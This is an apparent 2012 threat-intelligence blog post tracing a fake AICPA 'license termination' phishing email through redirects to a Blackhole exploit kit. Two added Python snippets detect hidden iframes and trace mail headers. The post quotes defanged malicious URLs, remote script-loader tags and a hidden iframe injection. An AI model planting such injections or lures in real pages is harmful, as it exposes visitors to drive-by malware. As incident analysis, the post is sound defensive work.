Channel: The Digital4rensics Blog » Exploit Kits
Threat Intel: AICPA.org Phishing Email

I received an email reportedly from support@aicpa.org this morning. The email was clearly a phishing email as I’m not a CPA and it was addressed to “Dear accounting officer”. A picture of the email is included below:

Phishing attempt received 2/17/2012

In order to avoid muddying up the post, the email header is included at the bottom of the page. Within the email, there are three links, which are included below and are considered MALICIOUS.
hxxp://omerteke.com/KM8PHYEu/index.html
hxxp://harboritalia.it/DxbQU2vE/index.html
hxxp://martvarauto.ee/sN6saxG7/index.html

Each of these sites then performs a number of redirects (identical on all three). The landing page displays only:
WAIT PLEASE
Loading…
while it loads the following remote scripts:
<script type="text/javascript" src="hxxp://46.20.6.63/0v5qYtwZ/js.js"></script>
<script type="text/javascript" src="hxxp://amarchand.awardspace.info/1gUNQseT/js.js"></script>
<script type="text/javascript" src="hxxp://rosecon.com.br/V71toiu2/js.js"></script>
<script type="text/javascript" src="hxxp://seniordatinggroup.com.au/7b1kameF/js.js"></script>
<script type="text/javascript" src="hxxp://vnnetsoft.vn/M3ags716/js.js"></script>
<script type="text/javascript" src="hxxp://www.limpfast.com.br/hZfvvbmd/js.js"></script>

Each of the scripts above redirects back to the link below:
hxxp://biggestsetter.com/search.php?page=73a07bcb51f4be71

This site hosts a live Blackhole exploit kit (Full Report). Additionally, it performs another redirection to hxxp://billydimple.com/search.php?page=73a07bcb51f4be71. Although that specific link is inactive at the moment (Full Report), other known malicious links at hxxp://billydimple.com have been analyzed; they host Blackhole and mimic the Bing search engine.

Additionally, the hxxp://omerteke.com page source includes obfuscated JavaScript that decodes to the following hidden iframe:
<iframe src='hxxp://datastatcount.com/1/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
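As an added illustration (not the post's own code), here is a Python scanner for the two injection patterns described above: a hidden or tiny iframe and a chain of remotely loaded scripts. The HTML sample is constructed from the markup quoted in the post, plus one ordinary iframe as a control.

```python
import re
from html.parser import HTMLParser

# Constructed sample reproducing the injected markup described in the post
# (a redirect page with js.js loaders and the hidden 10x10 iframe), plus one
# ordinary iframe as a control; not fetched from any live site.
SAMPLE_HTML = """<html><body>WAIT PLEASE<br>Loading...
<script type="text/javascript" src="hxxp://46.20.6.63/0v5qYtwZ/js.js"></script>
<script type="text/javascript" src="hxxp://rosecon.com.br/V71toiu2/js.js"></script>
<iframe src='hxxp://datastatcount.com/1/stat.php' width='10' height='10'
 style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
<iframe src='https://example.invalid/player' width='640' height='360'></iframe>
</body></html>"""

HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def _tiny(value, limit=20):
    """True when a width/height attribute is an explicit small pixel count."""
    if value is None:
        return False
    digits = re.sub(r"[^0-9]", "", value)
    return digits != "" and int(digits) <= limit

class InjectScanner(HTMLParser):
    """Collects iframes that are hidden or tiny, and scripts loaded remotely."""
    def __init__(self):
        super().__init__()
        self.hidden_iframes = []
        self.remote_scripts = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            hidden = bool(HIDDEN_STYLE.search(a.get("style") or ""))
            tiny = _tiny(a.get("width")) and _tiny(a.get("height"))
            if hidden or tiny:
                self.hidden_iframes.append(a.get("src") or "")
        elif tag == "script":
            src = a.get("src") or ""
            if src.lower().startswith(("http://", "https://", "hxxp://")):
                self.remote_scripts.append(src)

def scan(html):
    """Return the suspicious iframes and remote script sources found in html."""
    p = InjectScanner()
    p.feed(html)
    p.close()
    return {"hidden_iframes": p.hidden_iframes, "remote_scripts": p.remote_scripts}
```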

This URL in turn includes an additional obfuscated script with further redirects (full report).

That’s about all the analysis I have time for right now, but I’d be interested to see if anyone else comes across the phishing email or does any analysis on the eventual payload!

Received: from SN2PRD0702HT001.namprd07.prod.outlook.com (10.27.84.111) by
BY2PRD0710HT002.namprd07.prod.outlook.com (10.255.86.37) with Microsoft SMTP
Server (TLS) id 14.16.117.1; Fri, 17 Feb 2012 15:38:05 +0000
Received: from SN2PRD0702HT006.namprd07.prod.outlook.com (10.27.84.28) by
SN2PRD0702HT001.namprd07.prod.outlook.com (10.27.84.111) with Microsoft SMTP
Server (TLS) id 14.15.39.1; Fri, 17 Feb 2012 15:38:04 +0000
Received: from mail9-tx2-R.bigfish.com (65.55.88.116) by
SN2PRD0702HT006.namprd07.prod.outlook.com (10.27.84.28) with Microsoft SMTP
Server (TLS) id 14.15.39.1; Fri, 17 Feb 2012 15:38:04 +0000
Received: from mail9-tx2 (localhost [127.0.0.1]) by mail9-tx2-R.bigfish.com
(Postfix) with ESMTP id D3845180247 for ; Fri,
17 Feb 2012 15:38:04 +0000 (UTC)
X-Safelisted-IP: 192.149.109.20
X-Forefront-Antispam-Report: CIP:192.149.109.20;KIP:192.149.109.20;UIP:(null);(null);H:mail.norwich.edu;R:internal;EFV:INT
X-FOPE-CONNECTOR: SANITIZED
Received: from mail9-tx2 (localhost.localdomain [127.0.0.1]) by mail9-tx2
(MessageSwitch) id 1329493081419435_6792; Fri, 17 Feb 2012 15:38:01 +0000
(UTC)
Received: from TX2EHSMHS025.bigfish.com (unknown [10.9.14.253]) by
mail9-tx2.bigfish.com (Postfix) with ESMTP id 5567B1C0046 for
; Fri, 17 Feb 2012 15:38:01 +0000 (UTC)
Received: from mail.norwich.edu (192.149.109.20) by TX2EHSMHS025.bigfish.com
(10.9.99.125) with Microsoft SMTP Server id 14.1.225.23; Fri, 17 Feb 2012
15:37:58 +0000
X-IronPort-AV: E=Sophos;i="4.73,438,1325480400";
d="scan'208,217";a="31216418"
Received: from 187-62-239-56-pppoe-12089.brasweb.com.br ([187.62.239.56]) by
mail.norwich.edu with ESMTP; 17 Feb 2012 10:37:56 -0500
Received: from apache by aicpa.org with local (Exim 4.67) (envelope-from
) id HP7B4I-VX09A0-64 for ; Fri, 16 Feb
2012 12:37:56 -0300
To:
Subject: Termination of your accountant license.
X-PHP-Script: aicpa.org/sendmail.php for 187.62.239.56
From: Eloy Howell
X-Sender: “Eloy Howell”
X-Mailer: PHP
X-Priority: 1
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="————05020200503020303060601"
Message-ID:
Date: Thu, 16 Feb 2012 12:37:56 -0300
Return-Path: support@aicpa.org
X-MS-Exchange-Organization-SCL: 0
X-MS-Exchange-Organization-AVStamp-Mailbox: MSFTFF;1;0;0 0 0
X-MS-Exchange-Organization-AuthSource:
SN2PRD0702HT006.namprd07.prod.outlook.com
X-MS-Exchange-Organization-AuthAs: Anonymous
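To see where a message like this actually entered the mail system, here is an added Python example (not from the post) that unfolds the Received headers quoted above, walks the hops oldest-first, reports the first hop that arrived from a public IP, and compares that host with the Return-Path domain. The header sample is abridged from the post's own headers with standard folding restored.

```python
import re
import ipaddress
# Abridged from the headers quoted above (folding restored, newest hop first); constructed, not a live capture.
HEADERS = """\
Received: from mail.norwich.edu (192.149.109.20) by TX2EHSMHS025.bigfish.com
 (10.9.99.125) with Microsoft SMTP Server id 14.1.225.23; Fri, 17 Feb 2012
 15:37:58 +0000
Received: from 187-62-239-56-pppoe-12089.brasweb.com.br ([187.62.239.56]) by
 mail.norwich.edu with ESMTP; 17 Feb 2012 10:37:56 -0500
Received: from apache by aicpa.org with local (Exim 4.67) (envelope-from
 ) id HP7B4I-VX09A0-64 for ; Fri, 16 Feb
 2012 12:37:56 -0300
Return-Path: support@aicpa.org
"""

RECEIVED = re.compile(
    r"^Received:\s*from\s+(\S+)(?:\s+\(([^)]*)\))?.*?\bby\s+(\S+)", re.I | re.S)

def unfold(raw):
    """Join folded continuation lines (leading whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines

def hops(raw):
    """(from_host, from_ip, by_host) per Received header, oldest hop first."""
    out = []
    for m in filter(None, map(RECEIVED.match, unfold(raw))):
        ipm = re.search(r"\d+\.\d+\.\d+\.\d+", m.group(2) or "")
        out.append((m.group(1), ipm.group(0) if ipm else None, m.group(3)))
    return out[::-1]

def origin(raw):
    """Oldest hop that came from a public IP: the client that injected the mail."""
    for hop in hops(raw):
        if hop[1] and ipaddress.ip_address(hop[1]).is_global:
            return hop
    return None

def sender_mismatch(raw):
    """True when the Return-Path domain is not the injecting host's domain."""
    m = re.search(r"^Return-Path:.*@([\w.-]+)", "\n".join(unfold(raw)), re.M)
    o = origin(raw)
    host, dom = (o[0].lower() if o else ""), (m.group(1).lower() if m else "")
    return bool(host and dom) and host != dom and not host.endswith("." + dom)
```

The self-written "from apache by aicpa.org with local" hop is ignored because it carries no connecting IP; the first hop a third-party relay recorded is the one that identifies the real sender.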

